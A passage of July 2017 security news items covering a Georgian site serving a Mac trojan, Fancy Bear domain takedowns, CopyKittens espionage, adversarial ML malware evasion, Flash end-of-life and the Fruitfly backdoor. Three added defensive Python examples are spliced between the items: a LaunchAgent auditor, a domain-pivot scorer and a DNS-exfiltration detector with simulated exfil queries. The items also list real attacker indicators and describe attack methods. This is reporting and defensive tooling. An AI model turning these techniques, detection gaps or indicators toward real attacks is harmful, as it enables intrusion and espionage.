The investigation involved close cooperation between British, German and Cypriot law enforcement agencies, backed by the European Union's law enforcement intelligence agency, Europol, and Eurojust.


Georgian News Site Serves New Version of Old Mac Trojan

26.7.2017 securityweek Apple

Researchers at security firm Volexity noticed that the website of a media organization based in the country of Georgia had been serving a new version of an old Mac Trojan to specific visitors.

According to experts, the compromised news website has English, Russian and Georgian sections, but only the Georgian language pages appeared to deliver the malware. The threat is a new version of OSX/Leverage, a backdoor first spotted back in 2013.

Interestingly, not all visitors were targeted. JavaScript code planted on the site profiled each visitor and only served the malware if certain conditions were met: the user agent had to indicate a Mac and a web browser other than Chrome.

The script also checked cookies to determine if the user had previously visited the website and analyzed the malicious JavaScript code. If a returning user is detected, the exploitation chain is terminated.

If all the conditions are met and the potential victim is using the Safari browser from a Mac computer, an iframe is loaded and a fake Adobe website is displayed. The site is designed to trick users into downloading a fake Flash Player critical update.

The malicious Flash Player update is delivered via a Metasploit module that abuses Safari functionality to force the download and execution of an OS X application. However, the victim still needs to allow the execution of the file when prompted or manually execute it from the Downloads folder.

Once executed, the malware creates a Launch Agent for persistence and opens the genuine Adobe Flash Player website to avoid raising suspicion. The backdoor contacts its command and control (C&C) server and sends it information about the infected system.
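The Launch Agent persistence described above is something a defender can audit directly: launchd jobs are plain property lists under the user's and the system's LaunchAgents directories. The following is an added example, not Volexity's code or anything from the original article. It parses LaunchAgent plists and flags jobs whose program lives in a hidden or temporary path, that relaunch themselves if killed, or that carry a vendor-style label (such as a Flash Player update) while running from outside the vendor's directory. The two sample plists are constructed, and the path heuristics are assumptions about what a legitimately installed agent looks like.

```python
"""Audit macOS LaunchAgent plists for suspicious persistence entries.

Added example for the Leverage write-up above; it is not Volexity's code.
The sample plists are constructed and the path heuristics are assumptions.
"""
import plistlib
import re
from pathlib import Path
from typing import Dict, List, Optional

# Directories launchd scans for per-user and machine-wide agents.
LAUNCH_AGENT_DIRS = ["~/Library/LaunchAgents", "/Library/LaunchAgents"]

# Locations where a legitimately installed agent rarely lives (assumption).
SUSPICIOUS_PATH_PATTERNS = [
    re.compile(r"^/(private/)?(var/)?tmp/"),
    re.compile(r"/\.[^/]+"),                                  # hidden path component
    re.compile(r"^/Users/[^/]+/(Downloads|Library/Caches)/"),
]


def program_of(plist: dict) -> str:
    """Executable launchd will run: Program, or the first ProgramArguments entry."""
    if plist.get("Program"):
        return str(plist["Program"])
    args = plist.get("ProgramArguments") or []
    return str(args[0]) if args else ""


def assess(plist: dict) -> List[str]:
    """Reasons a reviewer should look at this job; an empty list means nothing stood out."""
    reasons: List[str] = []
    prog = program_of(plist)
    if not prog:
        reasons.append("no Program or ProgramArguments")
    for pat in SUSPICIOUS_PATH_PATTERNS:
        if pat.search(prog):
            reasons.append(f"program path matches {pat.pattern!r}")
            break
    if plist.get("RunAtLoad") and plist.get("KeepAlive"):
        reasons.append("RunAtLoad with KeepAlive (relaunches if killed)")
    # A fake "Flash Player update" agent borrows a vendor name it does not own.
    label = str(plist.get("Label", ""))
    if re.search(r"adobe|flash", label, re.I) and not prog.startswith(
            "/Library/Application Support/Adobe/"):
        reasons.append("vendor-style label but program outside the vendor's directory")
    return reasons


def audit_plist_bytes(data: bytes) -> Dict[str, object]:
    """Parse one plist (XML or binary) and return its label, program and reasons."""
    plist = plistlib.loads(data)
    return {"label": plist.get("Label"), "program": program_of(plist),
            "reasons": assess(plist)}


def audit_directories(dirs: Optional[List[str]] = None) -> List[Dict[str, object]]:
    """Audit every .plist in the LaunchAgent directories of a live Mac (no-op elsewhere)."""
    findings = []
    for d in dirs or LAUNCH_AGENT_DIRS:
        folder = Path(d).expanduser()
        if not folder.is_dir():
            continue
        for f in sorted(folder.glob("*.plist")):
            try:
                findings.append({"file": str(f), **audit_plist_bytes(f.read_bytes())})
            except Exception as exc:  # a malformed plist is itself worth a look
                findings.append({"file": str(f), "error": str(exc)})
    return findings


# Constructed samples (not real artifacts): a vendor-looking agent and a
# hidden-path "update" agent of the kind a fake Flash installer might drop.
BENIGN_PLIST = plistlib.dumps({
    "Label": "com.example.vendor.updater",
    "Program": "/Library/Application Support/Example/updater",
    "StartInterval": 3600,
})
SUSPICIOUS_PLIST = plistlib.dumps({
    "Label": "com.adobe.flashplayer.update",                    # hypothetical label
    "ProgramArguments": ["/Users/alice/Library/.cache/fpupdate", "--daemon"],
    "RunAtLoad": True,
    "KeepAlive": True,
})

if __name__ == "__main__":
    for name, data in (("benign", BENIGN_PLIST), ("suspicious", SUSPICIOUS_PLIST)):
        print(name, audit_plist_bytes(data))
    for finding in audit_directories():
        print(finding)
```

Run on a Mac, `audit_directories()` walks the real LaunchAgents folders; anywhere else it only reports on the two constructed samples. The heuristics are deliberately narrow so that the output is a review list, not a verdict.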

“Unlike the earlier version of the malware, this new version does not limit itself to a predefined set of commands and instead allows an unrestricted command shell capability back into an infected system,” Volexity researchers said in a blog post.

The new version of the Leverage malware, which was also spotted by Sophos earlier this month, is signed with an Apple code signing certificate issued to a developer apparently named “Aleks Papandopulo.”

The first version of Leverage had been disguised as an image file and in some cases it downloaded a logo of the Syrian Electronic Army hacker group onto compromised machines.

Interestingly, Volexity has discovered a link between an IP address associated with one of the domains serving the new version of Leverage and Stantinko, a recently uncovered botnet that has powered a massive adware campaign since 2012. The Stantinko operation has mainly targeted Russia and Ukraine.


Tech Firms Target Domains Used by Russia-linked Threat Group

26.7.2017 securityweek APT

Tech companies ThreatConnect and Microsoft are moving toward exposing and taking down domains associated with the Russia-linked threat group known as Fancy Bear.

Also tracked as APT28, Pawn Storm, Sofacy, Tsar Team, Strontium and Sednit, the threat group has been associated with a variety of high-profile cyber-attacks aimed at government and other types of organizations worldwide.

Last year, the threat group was said to have orchestrated election-related hacker attacks in the United States. The actor allegedly developed the so-called XTunnel malware specifically to compromise the Democratic National Committee (DNC) network last year, and was said in February 2017 to be using brand-new Mac malware to steal data.

ThreatConnect says their team was able to identify “dozens of recently registered domains and IPs that have varying levels of association to the Russian APT.” Moreover, the security firm discovered three name servers the group most likely used for domains, which allows defenders to “proactively identify new domains that may be associated with Fancy Bear activity”.

One of the domains, the security company reveals, is unisecproper[.]org, which was registered using the email address le0nard0@mail[.]com and is hosted on a dedicated server at the IP 92.114.92.134. The certificate used by this domain has already been associated (PDF) with Fancy Bear in operations targeting the DNC and the German Parliament, which clearly indicates that the domain is associated with the group.

Using the SSL certificate, ThreatConnect discovered recent IPs associated with Fancy Bear, along with numerous domains hosted on these IPs, also supposedly associated with the threat group. Some of these domains were discovered in previous investigations as well.

The researchers also managed to find name servers used by Fancy Bear, including nemohosts[.]com, bacloud[.]com, and laisvas[.]lt. The investigation eventually led to the discovery of hundreds of domains associated with these name servers, tens of which were hosted on dedicated servers.
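The pivots described in the last three paragraphs (certificate to IPs, IPs to co-hosted domains, name servers to further domains) can be expressed as a small scoring routine, and doing so makes ThreatConnect's caveat concrete: a shared certificate is strong evidence, a shared name server on mass shared hosting is weak. The code below is an added example and is not ThreatConnect's tooling. Every record in it is constructed (RFC 5737 addresses, `.example` names, placeholder certificate fingerprints); in practice the seed would be a confirmed domain such as the one named above, and the records would come from passive DNS, TLS scan data and WHOIS.

```python
"""Pivot from a confirmed seed domain to related infrastructure and grade each hit.

Added example; not ThreatConnect's code. All records are constructed.
"""
from dataclasses import dataclass, field
from typing import Dict, List, Set, Tuple


@dataclass
class InfraRecords:
    """Minimal stand-in for passive-DNS, TLS-scan and WHOIS data."""
    domain_ips: Dict[str, Set[str]]                  # A records seen per domain
    ip_cert: Dict[str, str]                          # TLS cert fingerprint served on the IP
    domain_ns: Dict[str, Set[str]]                   # name servers per domain
    domain_registrant: Dict[str, str]                # registrant email per domain
    ip_hosted: Dict[str, int] = field(default_factory=dict)  # domains hosted per IP


def is_dedicated(infra: InfraRecords, ips: Set[str], max_tenants: int = 2) -> bool:
    """Treat an IP hosting only a couple of domains as dedicated (assumption)."""
    return bool(ips) and all(infra.ip_hosted.get(ip, 0) <= max_tenants for ip in ips)


def pivot(infra: InfraRecords, seed: str,
          flagged_ns: Set[str]) -> Dict[str, Tuple[str, List[str]]]:
    """Return {domain: (confidence, reasons)} for every domain linked to the seed."""
    seed_ips = infra.domain_ips.get(seed, set())
    seed_certs = {infra.ip_cert[ip] for ip in seed_ips if ip in infra.ip_cert}
    seed_reg = infra.domain_registrant.get(seed)
    out: Dict[str, Tuple[str, List[str]]] = {}
    for domain, ips in infra.domain_ips.items():
        if domain == seed:
            continue
        reasons: List[str] = []
        certs = {infra.ip_cert[ip] for ip in ips if ip in infra.ip_cert}
        same_reg = bool(seed_reg) and infra.domain_registrant.get(domain) == seed_reg
        ns_hits = infra.domain_ns.get(domain, set()) & flagged_ns
        if certs & seed_certs:
            reasons.append("serves the seed's TLS certificate")
        if ips & seed_ips:
            reasons.append("resolves to an IP the seed uses")
        if same_reg:
            reasons.append("same registrant email as the seed")
        if ns_hits:
            reasons.append("uses flagged name server " + ", ".join(sorted(ns_hits)))
        if not reasons:
            continue
        dedicated = is_dedicated(infra, ips)
        if certs & seed_certs or (ips & seed_ips and dedicated):
            confidence = "high"
        elif same_reg or (ns_hits and dedicated):
            confidence = "medium"
        else:
            confidence = "low"   # shared hosting or name server only: needs corroboration
        out[domain] = (confidence, reasons)
    return out


# Constructed records; nothing here is a real indicator.
SAMPLE = InfraRecords(
    domain_ips={
        "seed-bad.example": {"203.0.113.10"},
        "cert-sibling.example": {"203.0.113.11"},
        "cohosted-dedicated.example": {"203.0.113.10"},
        "ns-dedicated.example": {"203.0.113.12"},
        "ns-shared.example": {"203.0.113.50"},
        "unrelated.example": {"198.51.100.7"},
    },
    ip_cert={"203.0.113.10": "sha1:PLACEHOLDER-CERT-A",
             "203.0.113.11": "sha1:PLACEHOLDER-CERT-A",
             "203.0.113.12": "sha1:PLACEHOLDER-CERT-B"},
    domain_ns={
        "seed-bad.example": {"ns1.flaggedhost.example"},
        "ns-dedicated.example": {"ns1.flaggedhost.example"},
        "ns-shared.example": {"ns1.flaggedhost.example"},
        "unrelated.example": {"ns.bigregistrar.example"},
    },
    domain_registrant={"seed-bad.example": "reg@placeholder.example",
                       "cohosted-dedicated.example": "other@placeholder.example"},
    ip_hosted={"203.0.113.10": 2, "203.0.113.11": 1, "203.0.113.12": 1, "203.0.113.50": 800},
)
FLAGGED_NS = {"ns1.flaggedhost.example"}

if __name__ == "__main__":
    for domain, (conf, why) in sorted(pivot(SAMPLE, "seed-bad.example", FLAGGED_NS).items()):
        print(f"{conf:6} {domain}: {'; '.join(why)}")
```

The grading mirrors the article's reasoning: a domain on a dedicated server behind a flagged name server is worth watching, while one on a name server shared with hundreds of tenants is only a lead until another pivot corroborates it.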

The researchers describe these domains as suspicious but caution that “consistencies in registration and hosting tactics do not definitively associate many of these suspicious domains with previous malicious, Fancy Bear activity.”

“It's important to caveat our confidence in these indicators' association to FANCY BEAR activity. For many of those indicators that we've included here, we don't know whether they have actually been used maliciously. But if known bad is all that you are worried about or interested in, then you'll always be at least one step behind the attacker. Only by leveraging intelligence to identify and exploit our adversaries' tactics can we move from a reactive, whack-a-mole state to a proactive, informed defense,” ThreatConnect says.

Microsoft, in the meantime, is taking legal action against Fancy Bear: the tech company filed a civil lawsuit in August 2016, seeking to seize command-and-control (C&C) domains used by the group. According to court documentation Microsoft made public, there are hundreds of domains containing Microsoft trademarks that it is looking to take control of.

The actors failed to appear in a federal court in Virginia to defend themselves, and Microsoft is pushing for a default judgment in its favor. By seizing the domains, Microsoft would be able to cut the group off from communicating with infected systems.

“Microsoft seeks a preliminary injunction directing the registries associated with these Internet domains to take all steps necessary to disable access to and operation of these Internet domains to ensure that changes or access to the Internet domains cannot be made absent a court order and that all content and material associated with these Internet domains are to be isolated and preserved pending resolution of the dispute. Microsoft seeks a permanent injunction, other equitable relief and damages,” Microsoft notes.

Previously, Microsoft used legal action to take down botnets. In 2012, as part of Operation b71, the company seized C&C servers associated with the notorious Zeus family of malware. In 2014, in an attempt to take down the Bladabindi (njRAT) and Jenxcus (NJw0rm) malware families, the company seized 23 No-IP domains to route bad traffic to a sinkhole.


Iranian 'CopyKittens' Conduct Foreign Espionage

26.7.2017 securityweek CyberSpy


An Iran-linked threat group named by researchers CopyKittens has been conducting foreign espionage on strategic targets in various countries. Trend Micro and ClearSky have published a report detailing the actor’s activities, including targets, tools and attack methods.

The first report on CopyKittens was published in November 2015, but the group is believed to have been active since at least 2013. The hackers initially appeared to mainly target Israeli individuals, including diplomats and researchers, but further analysis showed that its operations have also covered entities in Saudi Arabia, Turkey, the United States, Jordan and Germany.

The list of targets includes government organizations, academic institutions, IT firms, defense companies and contractors, municipal authorities, and employees of the United Nations.

According to the latest report on CopyKittens activity, dubbed Operation Wilted Tulip, the hackers have used a wide range of tools and tactics. In some cases, they relied on watering hole attacks in which news and other websites were compromised and set up to deliver exploits. The organizations whose websites were abused as watering holes include The Jerusalem Post, for which even Germany’s Federal Office for Information Security (BSI) issued an alert.

The hackers also delivered malware using malicious documents set up to exploit various vulnerabilities, including the recently discovered Office flaw tracked as CVE-2017-0199, which at one point was a zero-day. In one attack, the hackers breached the email account of an employee of the Ministry of Foreign Affairs in the Turkish Republic of Northern Cyprus. The compromised account was used to send out a weaponized document to foreign affairs ministries in various countries around the world.

Some of the attacks targeting Israeli entities also leveraged fake social media profiles, often appearing to belong to attractive women.

As for the tools and malware used by CopyKittens, they leveraged automated scanning and exploitation tools such as Havij, sqlmap and Acunetix to find vulnerabilities in the targeted websites.

The threat actor has used both its own and widely available malware and tools, including the TDTESS backdoor, the Matryoshka RAT, the Vminst lateral movement tool, the Cobalt Strike threat emulation software, Mimikatz, Metasploit, the ZPP compression utility, and the Empire post-exploitation tool.

Some of the tools and malware have allowed the group to use DNS for command and control (C&C) communications and data exfiltration.
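DNS-based C&C and exfiltration of the kind mentioned above leaves a characteristic footprint in resolver logs: one client issuing many queries for never-repeated, long, high-entropy subdomains of a single registered domain, often as TXT lookups. The following is an added example of that detection logic, not Trend Micro's or ClearSky's code. The resolver-log format, the log lines and the thresholds are all constructed or assumed; the registered-domain extraction is a naive two-label split that a real deployment would replace with a Public Suffix List lookup.

```python
"""Flag DNS query patterns consistent with DNS-based C&C or exfiltration.

Added example; not the report authors' detection logic. The log format,
sample lines and thresholds are constructed/assumed.
"""
import hashlib
import math
import re
from collections import defaultdict
from typing import Dict, Iterable, List, Optional, Tuple

# Constructed resolver-log format: "<timestamp> <client_ip> <qtype> <qname>"
LINE_RE = re.compile(r"^(\S+)\s+(\d+\.\d+\.\d+\.\d+)\s+([A-Z]+)\s+(\S+)$")


def parse_line(line: str) -> Optional[Tuple[str, str, str, str]]:
    """Return (timestamp, client, qtype, qname) or None for an unparseable line."""
    m = LINE_RE.match(line.strip())
    return m.groups() if m else None


def registered_domain(qname: str) -> str:
    """Last two labels; a real deployment would consult the Public Suffix List."""
    labels = qname.rstrip(".").lower().split(".")
    return ".".join(labels[-2:])


def shannon_entropy(s: str) -> float:
    """Bits per character; encoded data sits well above words like 'www' or 'mail'."""
    if not s:
        return 0.0
    counts: Dict[str, int] = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def profile(lines: Iterable[str]) -> Dict[Tuple[str, str], Dict[str, float]]:
    """Per (client, registered domain): unique subdomains, label length, entropy, TXT share."""
    buckets = defaultdict(lambda: {"subs": set(), "lens": [], "ents": [], "n": 0, "txt": 0})
    for line in lines:
        rec = parse_line(line)
        if not rec:
            continue
        _, client, qtype, qname = rec
        reg = registered_domain(qname)
        sub = qname.rstrip(".").lower()[:-len(reg)].rstrip(".")
        b = buckets[(client, reg)]
        b["n"] += 1
        b["txt"] += qtype == "TXT"
        if sub:
            first = sub.split(".")[0]          # the leftmost label carries the payload
            b["subs"].add(sub)
            b["lens"].append(len(first))
            b["ents"].append(shannon_entropy(first))
    out = {}
    for key, b in buckets.items():
        out[key] = {
            "queries": b["n"],
            "unique_subdomains": len(b["subs"]),
            "mean_label_len": sum(b["lens"]) / len(b["lens"]) if b["lens"] else 0.0,
            "mean_entropy": sum(b["ents"]) / len(b["ents"]) if b["ents"] else 0.0,
            "txt_share": b["txt"] / b["n"],
        }
    return out


def flag(lines: Iterable[str], min_unique: int = 10, min_len: int = 20,
         min_entropy: float = 3.0) -> List[Tuple[str, str]]:
    """Keys whose profile looks like encoded data riding on DNS labels (thresholds assumed)."""
    return [k for k, p in profile(lines).items()
            if p["unique_subdomains"] >= min_unique
            and p["mean_label_len"] >= min_len
            and p["mean_entropy"] >= min_entropy]


def _fake_payload_label(i: int) -> str:
    """Deterministic random-looking hex label standing in for encoded data (constructed)."""
    return hashlib.sha256(f"chunk-{i}".encode()).hexdigest()[:40]


# Constructed log: 25 TXT lookups carrying payload-like labels, plus ordinary traffic.
SAMPLE_LOG = [
    f"2017-07-26T10:00:{i:02d}Z 10.0.0.5 TXT {_fake_payload_label(i)}.exfil-demo.example"
    for i in range(25)
] + [
    "2017-07-26T10:01:00Z 10.0.0.5 A www.example.com",
    "2017-07-26T10:01:01Z 10.0.0.5 A mail.example.com",
    "2017-07-26T10:01:02Z 10.0.0.7 A www.example.com",
    "2017-07-26T10:01:03Z 10.0.0.7 AAAA cdn.static.example.net",
    "not a log line",
]

if __name__ == "__main__":
    for key, stats in profile(SAMPLE_LOG).items():
        print(key, stats)
    print("flagged:", flag(SAMPLE_LOG))
```

The three thresholds are a starting point, not tuned values; in production they are set per environment from a baseline of normal resolver traffic, and CDN or anti-spam domains that legitimately use long, unique labels are allow-listed.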

CopyKittens is not the only Iran-linked cyber espionage group. In the past years, security firms have also exposed the activities of actors known as Rocket Kitten, COBALT GYPSY, and Charming Kitten (Newscaster, NewsBeef).


CrowdStrike Launches Cybersecurity Search Engine

26.7.2017 securityweek Cyber

Cloud-based endpoint security firm CrowdStrike announced on Tuesday that it has expanded the capabilities of its Falcon platform by adding a powerful search engine.

The search engine is powered by Falcon MalQuery, which CrowdStrike claims is more than 250 times faster than other malware search tools. MalQuery uses a patent-pending indexing technology and allows users to filter results so that they are provided only the most relevant information.

CrowdStrike says its threat database has indexed more than 700 million files totaling over 560 TB of malware, and it ingests over 51 billion security events every day. String- and YARA-based searches can be conducted via a single console and results are displayed as schematized, readily consumable snapshots.

The results of the search, which analyzes both a file’s metadata and content, are augmented with CrowdStrike intelligence to provide security operations center (SOC) personnel information on context and severity.

The security firm pointed out that faster and more accurate search results help streamline security operations, which ultimately leads to improved protection against new threats.

“Today’s threat landscape demands speed and precision – some of the best minds in cybersecurity are hampered by slow search tools and limited data sets. We believe that real-time data access is how cybersecurity professionals can get ahead of modern-day threats, and we’ve built the fastest AI-enabled platform that makes this possible,” said George Kurtz, CrowdStrike co-founder and CEO.

“With today’s launch, we are fundamentally changing the game by empowering threat researchers to outpace the adversary with this solution. CrowdStrike Falcon Search Engine enables the next-gen SOC to be more productive and acts as a powerful force multiplier for security teams,” Kurtz added.

Earlier this month, CrowdStrike announced that it teamed up with Dragos to provide cybersecurity services for industrial control systems (ICS).


Bot vs Bot in Never-Ending Cycle of Improving Artificial intelligence

26.7.2017 securityweek BotNet

Artificial intelligence, usually in the form of machine learning (ML), is infosecurity's current buzz. Many consider it will be the savior of the internet, able to defeat hackers and malware by learning and responding to their behavior in all-but real time. But others counsel caution: it is a great aid; but not a silver bullet.

The basic problem is that if machine learning can learn to detect malware, machine learning can learn to avoid detection by machine learning. This is a problem that exercises Hyrum Anderson, technical director of data science at Endgame.

At BSides Las Vegas in August 2016 he presented his work 'Deep Adversarial Architectures for Detecting (and Generating!) Maliciousness'. He described the concept of red team vs. blue team gaming, where a 'malicious' algorithm continually probes a defensive algorithm looking for weaknesses, and the defensive algorithm learns from the probes how to improve itself.

This week, at the Black Hat conference, Anderson takes the concept further in a presentation titled 'Testing Machine Learning Malware Detection via Adversarial Probing'. The purpose is simple -- to use machine learning to test and improve machine learning defenses. In reality, it is an important step in the continuing battle between attackers and defenders.

Omri Moyal, co-founder and VP of research at Minerva, explains. "Given the increased adoption of anti-malware products that use machine learning, most adversaries will soon arm themselves with the capabilities to evade it," he told SecurityWeek. "The most sophisticated attackers will develop their own offensive models. Some will copy ideas and code from various publicly-available research papers and some will even use simple trial and error, or replicate the offensive efforts of another group. In this cat-and-mouse chase, the defenders should change their model to mark the evolved attack tool as malicious. A process which is the modern version of 'malware signature' but more complex."

Anderson's theories will help the defender to stay ahead of the attacker by being both cat and mouse. His Black Hat presentation starts with the understanding that "all machine learning models have blind spots or hallucination spots (modeling error)." At the same time, an advanced attacker knows what models are used by the defender; and can use his own ML to probe for those blind spots.

Moyal explained the implications for defenders. "Just like in previous generations of anti-virus software, attackers can constantly evaluate their malware against the machine learning model until a successful variant is created," he told SecurityWeek. Malware authors have long tested new or repackaged malware against VirusTotal-like services to see whether it is likely to get past the defenders' AV defenses. Now they will use ML to test their malware against the known ML defenses, seeking out the blind spots.

"The resulting specimen," continued Moyal, "can be used against each victim whose protection relies on this model, offering the attacker a high degree of certainty the malicious program will not be detected. Attackers can also automate this process of generating malware that bypasses the model and even use offensive machine learning to improve this process."

Anderson's research is based on the idea of finding the blind spots and closing them before the attackers find them. Ironically, this can be achieved by doing exactly what the attackers will do -- use machine learning to probe machine learning. This is nothing more than what security researchers have been doing for decades: probe software to find the weaknesses and get those weaknesses patched before they are found and exploited by the bad people.

In today's presentation, Anderson describes a scientific approach on how to evade malware detection with an AI agent to compete against the malware detector. Although in this instance focusing on Windows PE, the framework is generic and can be used in other domains.

The agent examines a PE file and probes it to find a way to evade the malware detection model. The agent learns how to 'beat' the defense. However, as used by the defenders, this approach simply finds the blind spots that can then be fixed. Used solely by attackers, it finds the blind spots that can be exploited.

Anderson's key takeaway is that machine learning anti-malware that has just been bought and installed will offer early success in malware protection, but it will quickly become porous against advanced adversaries. Staying one jump ahead of the bad guys has always been, and remains, the key to infosecurity even in the age of artificial intelligence.

Hyrum Anderson, Bobby Filar, and Phil Roth from Endgame, together with Anant Kharkar from the University of Virginia, have published an associated white paper: Evading Machine Learning Malware Detection (PDF).


IBM Launches Security Testing Services For Cars, IoT

26.7.2017 securityweek IoT

IBM Security announced on Monday that the services provided by its X-Force Red penetration testing group have been expanded to include connected vehicles and Internet of Things (IoT) devices.

IBM X-Force Red, which the company launched one year ago, has been working with automotive manufacturers and third-party suppliers to provide expertise and penetration testing and consulting services.

Researchers will also apply some of the findings from research disclosed earlier this year into the risks associated with purchasing used connected cars. They showed that insecure transfer of ownership can allow the previous owner to unlock the car, start it remotely and track its location.

Both independent experts and researchers at security firms have demonstrated on several occasions in recent years that cars can be hacked, and the risk of a cyberattack will only increase as the number of connected vehicles is expected to reach a quarter billion by 2020.

IBM’s X-Force Red team aims to help customers in the automotive industry secure hardware, software, networks and human interactions.

As for IoT testing, the service will leverage IBM’s Watson IoT platform, a cognitive system that allows organizations to easily connect and manage their IoT devices. The product has built-in security controls and IoT threat intelligence capabilities that help organizations visualize risks and develop efficient incident response through policy-driven automations.

IBM customers using the Watson IoT platform can get help from the X-Force Red team in ensuring that their products are secure from development to deployment.

“It’s not just about the technology, it is also about the global reach, investment, and collaborative approach which make IBM a trusted IoT partner for enterprise IoT solutions,” said James Murphy, Offering Manager, IBM Watson IoT Platform. “With IoT technologies permeating the farthest corners of industry, IBM is bringing our Watson IoT Platform and X-Force Red security talent together to address present and future concerns.”


Adobe to Kill Flash Player, End Support by 2020

26.7.2017 securityweek IT

[Breaking] Adobe on Tuesday said that it would kill its Flash Player and stop providing security updates by the end of 2020.

Adobe Flash Player has made headlines over the years due to the large number of serious vulnerabilities identified by both white and black hat hackers. The company has been forced to issue emergency patches on several occasions after learning that malicious actors had been exploiting unpatched Flash Player vulnerabilities in their operations.

According to the company, the decision was made in collaboration with several Adobe technology partners including Apple, Facebook, Google, Microsoft and Mozilla.

“Specifically, we will stop updating and distributing the Flash Player at the end of 2020 and encourage content creators to migrate any existing Flash content to these new open formats,” Adobe said.

Adobe said it would continue to support Flash on a number of major OSs and browsers that currently support Flash content through the planned EOL.

“This will include issuing regular security patches, maintaining OS and browser compatibility and adding features and capabilities as needed,” Adobe said in a blog post. “We remain fully committed to working with partners, including Apple, Facebook, Google, Microsoft and Mozilla to maintain the security and compatibility of Flash content.”

While Adobe has only now officially decided to kill off the vulnerable software product, many other leading internet firms have been pushing hard against it over the past years and trying to limit the use of Flash across their products and services.

In May 2016, Google announced its plans to block Adobe Flash and implement an 'HTML5 by Default' policy on Chrome by the end of 2016.

“It is time for Adobe to announce the end-of-life date for Flash and to ask the browsers to set killbits on the same day,” Facebook’s CSO, Alex Stamos, said in July 2015 after the existence of several Flash Player zero-day flaws was brought to light by the data breach suffered by Italian spyware maker Hacking Team.

In June 2016, Google stopped accepting display ads built in Adobe Flash, not long after Amazon stopped accepting Flash ads on its online shopping website. At the time, Amazon said that the move, which went into effect on Sept. 1, 2015, was prompted by browser settings in Chrome, Firefox, and Safari that were meant to limit Flash content displayed on web pages.

Nathan Wenzler, chief security strategist at security consulting company AsTech, believes there will be a lot of split feelings about the official EOL announcement for Flash.

“On one hand, a great deal of the multimedia games, videos, graphics and other rich services that have helped make the Internet what it is today were originally built on Flash. It provided a great platform for a huge array of products, and it could be argued we wouldn't be where we are today without it,” Wenzler told SecurityWeek. “That said, the security world will likely rejoice at the retirement of a product which has had a huge number of well-known vulnerabilities and flaws over the years, which have been the entry point for malicious tools that have compromised millions of systems across the globe.”

“While Adobe has been increasingly more vigilant about hardening Flash and more consistently providing patches and hotfixes whenever a vulnerability was identified, it still served as a particular pain point for a lot of organizations to keep Flash patched and maintain a consistent security posture for their systems which had Flash installed,” Wenzler added.

Chris Roberts, chief security architect at threat detection and defense solutions provider Acalvio, pointed out that the end of Flash Player has been coming for a while.

“It’s been good while we had it, but let’s face it, it’s been a whipping boy of the security industry for a while with more than 1000 CVEs dedicated to it throughout the years,” Roberts said via email. “Kind of like many of us in the industry that find ourselves getting grayer and less tolerant of others, it’s time to hang up the hat and work out how to retire. At least in Flash’s world, it’s been given a nice sunset (until 2020) and probably a good pension in the vaults of software somewhere.”

Flash Player was originally developed by Macromedia, which was acquired by Adobe in 2005.


Sweden Rattled by Massive Confidential Data Leak

26.7.2017 securityweek BigBrothers

Sweden's minority government was battling to contain the fallout Monday after a massive leak that may have made confidential military information accessible abroad, as well as the private data of millions of citizens.

The leak made an entire database on Swedish drivers' licenses available to technicians in the Czech Republic and Romania, with media reporting that the identities of intelligence agents may have been jeopardized.

"What has happened is an accident," Prime Minister Stefan Lofven told a news conference in Stockholm, adding that an investigation has been launched.

"It has happened in violation of the law and exposed Sweden and Swedish citizens to harm," Lofven said.

One of the largest breaches of government information in Sweden in decades, the scandal may threaten the ruling Social Democrat-led coalition as opposition parties have said they could put the issue to a confidence vote in parliament.

The leak stems from the transport agency's hiring of IBM in 2015 to take over its IT operations.

IBM in turn used subcontractors in the Czech Republic and Romania -- making the sensitive information accessible by foreign technicians.

- 'Keys to the kingdom' -

The transport agency's director general Maria Agren resigned in January for unknown reasons, but she has since confessed to violating data-handling rules and accepted a fine of 70,000 Swedish kronor (around 7,000 euros, $8,000), according to media reports earlier this month.

The Swedish military said in a statement Saturday that information on its personnel, vehicles and defense and contingency planning could have been amongst the leaked data.

But the transport agency has denied having a register on military vehicles and added that "nothing indicates" the leaked information has been "spread in an improper way".

An official at the agency told the Dagens Nyheter newspaper that carelessness with Swedes' data was like "giving away the keys to the kingdom".

Grilled by reporters on Monday, Lofven said he was told about the leak in January by his state secretary.

Defense Minister Peter Hultqvist and Interior Minister Anders Ygeman had known about it since 2016, according to several media reports.

And Infrastructure Minister Anna Johansson, who oversees the transport agency, told TT news agency on Sunday that her former state secretary had known about the leak but kept the information hidden from her -- triggering outrage among opposition parties.

"(The fact) that a responsible minister didn't know what happened within her own field provides no confidence at all," Jonas Sjostedt, leader of the Left party, told TT.

Annie Loof, leader of the Centre party, said in a statement Sunday that "a vote of no-confidence would not be excluded".


Fruitfly macOS and OS X backdoor remained undetected for years
26.7.2017 securityaffairs Apple

A new mysterious strain of macOS and OS X malware dubbed Fruitfly went undetected by malware researchers and security software for at least five years.
Fruitfly is a backdoor that gives attackers full control over infected systems and implements a wide range of spying features.

Fruitfly has the ability to capture screenshots, keystrokes, webcam images, and steal data from the infected Mac.

Patrick Wardle, chief security researcher at Synack and former NSA analyst, has analyzed a sample of the malware and will present his findings this week at the hacking conference Black Hat.

The expert built a custom command and control server to examine the FruitFly backdoor, and he announced the release of a number of tools used in his analysis, including a user-mode process monitor.


It has been estimated that the number of infected devices is roughly 400 and likely much higher.

“[FruitFly] was designed in a way to be interactive,” explained Wardle. “This can move the mouse, generate presses and interact with the UI elements of the operating system.”

The FruitFly sample analyzed by Patrick Wardle is a variant of a malware that was spotted in January by experts at Malwarebytes after being undetected for at least two years.

After the discovery of the malware in January, Apple updated macOS to automatically detect the malware, but the strain of malware found by Wardle remained undetected by macOS security system and antivirus products.

The Fruitfly malware relies on functions that were deprecated long ago and uses a crude method to gain persistence. Compared to other Mac malware it is much easier to detect.

A submission to the VirusTotal malware detection service shows that only 22 out of 57 antivirus engines are able to detect the malware.

The analysis of the malware allowed Wardle to decrypt several backup domains that were hardcoded, and the good news is that the domains remained available allowing him to register one of them.

The expert set up a “sink hole” with the registered domain and noticed that close to 400 infected Macs connected to the server, most of them from the United States. Although Wardle did nothing more than

Wardle explained that he was able to send commands to the infected machines to spy on the victims, but he did not do so in order to respect their privacy.

Wardle explained that the method of infection is still unknown; he suspects the victims were tricked into clicking malicious links.

Wardle also explained that the real motivation of the attackers is still unclear: the malware is not able to steal payment card data or to deliver other malicious payloads (e.g. ransomware) that would monetize the attackers' effort.

However, the fact that the malware targets home users led the researcher to exclude the involvement of a nation-state attacker.

